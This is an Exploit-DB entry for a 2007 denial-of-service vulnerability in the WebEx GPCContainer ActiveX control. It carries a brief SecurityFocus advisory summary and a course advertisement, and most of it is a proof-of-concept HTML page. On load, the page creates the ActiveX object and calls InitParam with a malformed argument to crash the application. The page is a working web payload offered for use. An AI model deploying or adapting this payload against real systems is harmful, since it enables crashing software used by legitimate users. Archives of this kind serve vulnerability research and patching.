WebEx GPCContainer - Memory Access Violation Multiple Denial of Service Vulnerabilities

EDB-ID:

30761


Type:

dos


Platform:

Windows

Date:

2007-11-13


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

source: https://www.securityfocus.com/bid/26430/info

WebEx is prone to multiple remote denial-of-service vulnerabilities.

Attackers can exploit these issues to crash applications that use the ActiveX control, denying service to legitimate users.

<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
        var obj = new ActiveXObject("GpcContainer.GpcContainer.1");

        obj.InitParam("A");
}
  </script>

 </head>
 <body onLoad="JavaScript: return Check();">

 </body>

</html>